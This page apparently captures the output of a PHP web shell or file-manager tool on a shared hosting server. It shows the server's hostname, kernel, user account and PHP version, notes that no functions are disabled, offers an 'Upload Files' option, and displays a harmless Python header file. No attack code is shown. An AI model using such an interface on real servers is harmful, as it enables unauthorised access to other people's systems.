HEX
Server: Apache
System: Linux box5899.bluehost.com 5.14.0-687.12.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jun 7 14:39:27 EDT 2026 x86_64
User: rmdywdmy (3293)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: //usr/include/python3.9/pyconfig.h
#include <bits/wordsize.h>

#if __WORDSIZE == 32
#include "pyconfig-32.h"
#elif __WORDSIZE == 64
#include "pyconfig-64.h"
#else
#error "Unknown word size"
#endif